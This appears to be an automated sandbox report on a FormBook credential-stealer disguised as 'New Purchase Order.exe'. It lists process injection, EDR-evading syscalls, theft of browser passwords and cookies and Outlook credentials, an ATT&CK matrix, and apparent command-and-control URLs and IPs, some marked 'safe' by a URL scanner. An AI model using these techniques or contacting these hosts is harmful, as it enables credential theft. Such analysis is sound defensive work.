                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exeNtMapViewOfSection: Direct from: 0x77762D1CJump to behavior
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exeNtNotifyChangeKey: Direct from: 0x77763C2CJump to behavior
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exeNtCreateMutant: Direct from: 0x777635CCJump to behavior
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exeNtResumeThread: Direct from: 0x777636ACJump to behavior
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exeNtQuerySystemInformation: Direct from: 0x77762DFCJump to behavior
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exeNtAllocateVirtualMemory: Direct from: 0x77762BFCJump to behavior
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exeNtDelayExecution: Direct from: 0x77762DDCJump to behavior
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exeNtWriteVirtualMemory: Direct from: 0x7776490CJump to behavior
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exeNtQueryInformationProcess: Direct from: 0x77762C26Jump to behavior
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exeNtResumeThread: Direct from: 0x77762FBCJump to behavior
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exeNtCreateUserProcess: Direct from: 0x7776371CJump to behavior
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exeNtSetInformationThread: Direct from: 0x777563F9Jump to behavior
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exeNtAllocateVirtualMemory: Direct from: 0x77763C9CJump to behavior
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exeNtSetInformationThread: Direct from: 0x77762B4CJump to behavior
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exeNtQueryAttributesFile: Direct from: 0x77762E6CJump to behavior
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exeNtClose: Direct from: 0x77762B6C
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exeNtReadVirtualMemory: Direct from: 0x77762E8CJump to behavior
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exeNtCreateKey: Direct from: 0x77762C6CJump to behavior
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exeNtQuerySystemInformation: Direct from: 0x777648CCJump to behavior
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exeNtAllocateVirtualMemory: Direct from: 0x777648ECJump to behavior
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2CJump to behavior
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exeNtOpenSection: Direct from: 0x77762E0CJump to behavior
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exeNtDeviceIoControlFile: Direct from: 0x77762AECJump to behavior
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exeNtAllocateVirtualMemory: Direct from: 0x77762BECJump to behavior
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exeNtQueryInformationToken: Direct from: 0x77762CACJump to behavior
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exeNtTerminateThread: Direct from: 0x77762FCCJump to behavior
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exeNtCreateFile: Direct from: 0x77762FECJump to behavior
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exeNtOpenFile: Direct from: 0x77762DCCJump to behavior
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exeNtOpenKeyEx: Direct from: 0x77762B9CJump to behavior
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exeNtSetInformationProcess: Direct from: 0x77762C5CJump to behavior
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exeNtProtectVirtualMemory: Direct from: 0x77762F9CJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\New Purchase Order.exeMemory written: C:\Users\user\Desktop\New Purchase Order.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: NULL target: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: NULL target: C:\Windows\SysWOW64\isoburn.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: NULL target: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: NULL target: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\isoburn.exeThread register set: target process: 8060Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\isoburn.exeThread APC queued: target process: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exeJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Users\user\Desktop\New Purchase Order.exe "C:\Users\user\Desktop\New Purchase Order.exe"Jump to behavior
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exeProcess created: C:\Windows\SysWOW64\isoburn.exe "C:\Windows\SysWOW64\isoburn.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: ILRIqlNpKN.exe, 0000000B.00000000.1710180046.0000000001530000.00000002.00000001.00040000.00000000.sdmp, ILRIqlNpKN.exe, 0000000B.00000002.2503685681.0000000001530000.00000002.00000001.00040000.00000000.sdmp, ILRIqlNpKN.exe, 0000000F.00000002.2503906875.0000000001470000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: ILRIqlNpKN.exe, 0000000B.00000000.1710180046.0000000001530000.00000002.00000001.00040000.00000000.sdmp, ILRIqlNpKN.exe, 0000000B.00000002.2503685681.0000000001530000.00000002.00000001.00040000.00000000.sdmp, ILRIqlNpKN.exe, 0000000F.00000002.2503906875.0000000001470000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: ILRIqlNpKN.exe, 0000000B.00000000.1710180046.0000000001530000.00000002.00000001.00040000.00000000.sdmp, ILRIqlNpKN.exe, 0000000B.00000002.2503685681.0000000001530000.00000002.00000001.00040000.00000000.sdmp, ILRIqlNpKN.exe, 0000000F.00000002.2503906875.0000000001470000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
                Source: ILRIqlNpKN.exe, 0000000B.00000000.1710180046.0000000001530000.00000002.00000001.00040000.00000000.sdmp, ILRIqlNpKN.exe, 0000000B.00000002.2503685681.0000000001530000.00000002.00000001.00040000.00000000.sdmp, ILRIqlNpKN.exe, 0000000F.00000002.2503906875.0000000001470000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Users\user\Desktop\New Purchase Order.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 8.2.New Purchase Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.New Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000002.2504764936.0000000004FB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2504595570.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1802340640.00000000015B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2507216654.00000000051A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1801600414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2505024909.0000000002BC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1804003305.0000000001A10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\isoburn.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 8.2.New Purchase Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.New Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000002.2504764936.0000000004FB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2504595570.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1802340640.00000000015B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2507216654.00000000051A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1801600414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2505024909.0000000002BC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1804003305.0000000001A10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		412
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		5
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture5
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1567410 Sample: New Purchase Order.exe Startdate: 03/12/2024 Architecture: WINDOWS Score: 100 31 www.cyperla.xyz 2->31 33 cyperla.xyz 2->33 35 4 other IPs or domains 2->35 45 Multi AV Scanner detection for submitted file 2->45 47 Yara detected FormBook 2->47 49 Yara detected AntiVM3 2->49 53 4 other signatures 2->53 10 New Purchase Order.exe 3 2->10         started        signatures3 51 Performs DNS queries to domains with low reputation 31->51 process4 file5 29 C:\Users\user\...29ew Purchase Order.exe.log, ASCII 10->29 dropped 65 Injects a PE file into a foreign processes 10->65 14 New Purchase Order.exe 10->14         started        signatures6 process7 signatures8 67 Maps a DLL or memory area into another process 14->67 17 ILRIqlNpKN.exe 14->17 injected process9 signatures10 43 Found direct / indirect Syscall (likely to bypass EDR) 17->43 20 isoburn.exe 13 17->20         started        process11 signatures12 55 Tries to steal Mail credentials (via file / registry access) 20->55 57 Tries to harvest and steal browser information (history, passwords, etc) 20->57 59 Modifies the context of a thread in another process (thread injection) 20->59 61 3 other signatures 20->61 23 ILRIqlNpKN.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 cyperla.xyz 31.186.11.114, 49830, 80 BETAINTERNATIONALTR Turkey 23->37 39 www.madhf.tech 103.224.182.242, 49901, 49907, 49915 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 23->39 41 2 other IPs or domains 23->41 63 Found direct / indirect Syscall (likely to bypass EDR) 23->63 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                New Purchase Order.exe42%ReversingLabsWin32.Backdoor.FormBook
                New Purchase Order.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.madhf.tech/6ou6/?HZ=We72k2U8RqyHNx9c0lgrcMajP0%Avira URL Cloudsafe
                http://www.cyperla.xyz/qygv/?Z4=CrodyR&HZ=PNgLNtFNavTWVACj/R5fAEIERpwPFUn3Y2lvnmQ+PypmeASZv9aNxFxhHJqyS8bM8Pjr3wsa5/scE4diKg4WnueYbl0MlUQedog3ODQ7MufRvJpC6GuxIcFfxXtcYIG+pMPKAdgLM64C0%Avira URL Cloudsafe
                http://www.bser101pp.buzz0%Avira URL Cloudsafe
                http://www.bser101pp.buzz/v89f/0%Avira URL Cloudsafe
                http://www.bser101pp.buzz/v89f/?HZ=vR3kWP+v98PFeIQX6HbJh3lQDWTjSRYryWjHUGMo4+T5xi8TnNV+jgD2+4ag3QdSrCwOZVBfu0hve5I79B9k3LEpkgrWWSGAJgqoML7k7rmuMTR7pR2QKok4A/6U1dLUrAezCoD2ZYZu&Z4=CrodyR0%Avira URL Cloudsafe
                http://www.madhf.tech/6ou6/0%Avira URL Cloudsafe
                http://www.madhf.tech/6ou6/?HZ=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t4Wjx9MdK2LZUtOM2FmXlL5GxHvEoA3gFavIudvI/vR7LkiZUXjXX7Xfe&Z4=CrodyR0%Avira URL Cloudsafe
                http://www.cstrategy.online/qx5d/0%Avira URL Cloudsafe
                https://www.cstrategy.online/qx5d/?HZ=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RC0%Avira URL Cloudsafe
                https://login.live.L0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                cstrategy.online
                		194.76.119.60
                		truefalse
                  		unknown
                  www.madhf.tech
                  		103.224.182.242
                  		truefalse
                    		high
                    cyperla.xyz
                    		31.186.11.114
                    		truetrue
                      		unknown
                      www.bser101pp.buzz
                      		104.21.58.90
                      		truefalse
                        		high
                        www.cstrategy.online
                        		unknown
                        		unknownfalse
                          		unknown
                          www.cyperla.xyz
                          		unknown
                          		unknowntrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://www.bser101pp.buzz/v89f/?HZ=vR3kWP+v98PFeIQX6HbJh3lQDWTjSRYryWjHUGMo4+T5xi8TnNV+jgD2+4ag3QdSrCwOZVBfu0hve5I79B9k3LEpkgrWWSGAJgqoML7k7rmuMTR7pR2QKok4A/6U1dLUrAezCoD2ZYZu&Z4=CrodyRfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.madhf.tech/6ou6/?HZ=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t4Wjx9MdK2LZUtOM2FmXlL5GxHvEoA3gFavIudvI/vR7LkiZUXjXX7Xfe&Z4=CrodyRfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.bser101pp.buzz/v89f/false
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.cyperla.xyz/qygv/?Z4=CrodyR&HZ=PNgLNtFNavTWVACj/R5fAEIERpwPFUn3Y2lvnmQ+PypmeASZv9aNxFxhHJqyS8bM8Pjr3wsa5/scE4diKg4WnueYbl0MlUQedog3ODQ7MufRvJpC6GuxIcFfxXtcYIG+pMPKAdgLM64Cfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.madhf.tech/6ou6/false
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.cstrategy.online/qx5d/false
                            • Avira URL Cloud: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://ac.ecosia.org/autocomplete?q=isoburn.exe, 0000000C.00000003.2009114135.00000000084E8000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://duckduckgo.com/chrome_newtabisoburn.exe, 0000000C.00000003.2009114135.00000000084E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://duckduckgo.com/ac/?q=isoburn.exe, 0000000C.00000003.2009114135.00000000084E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.bser101pp.buzzILRIqlNpKN.exe, 0000000F.00000002.2507216654.0000000005224000.00000040.80000000.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoisoburn.exe, 0000000C.00000003.2009114135.00000000084E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchisoburn.exe, 0000000C.00000003.2009114135.00000000084E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=isoburn.exe, 0000000C.00000003.2009114135.00000000084E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://localhost/arkanoid_server/requests.phpNew Purchase Order.exe, 00000000.00000002.1298865239.00000000032A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=isoburn.exe, 0000000C.00000003.2009114135.00000000084E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.ecosia.org/newtab/isoburn.exe, 0000000C.00000003.2009114135.00000000084E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=isoburn.exe, 0000000C.00000003.2009114135.00000000084E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://login.live.Lisoburn.exe, 0000000C.00000002.2501042971.0000000003489000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.cstrategy.online/qx5d/?HZ=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RCisoburn.exe, 0000000C.00000002.2506017590.0000000005D86000.00000004.10000000.00040000.00000000.sdmp, ILRIqlNpKN.exe, 0000000F.00000002.2505584035.00000000032E6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.madhf.tech/6ou6/?HZ=We72k2U8RqyHNx9c0lgrcMajPILRIqlNpKN.exe, 0000000F.00000002.2505584035.0000000003478000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                104.21.58.90
                                                		www.bser101pp.buzzUnited States
                                                		13335CLOUDFLARENETUSfalse
                                                31.186.11.114
                                                		cyperla.xyzTurkey
                                                		199484BETAINTERNATIONALTRtrue
                                                103.224.182.242
                                                		www.madhf.techAustralia
                                                		133618TRELLIAN-AS-APTrellianPtyLimitedAUfalse
                                                194.76.119.60
                                                		cstrategy.onlineItaly
                                                		202675KELIWEBITfalse

                                                General Information

                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1567410
                                                Start date and time:2024-12-03 14:40:02 +01:00
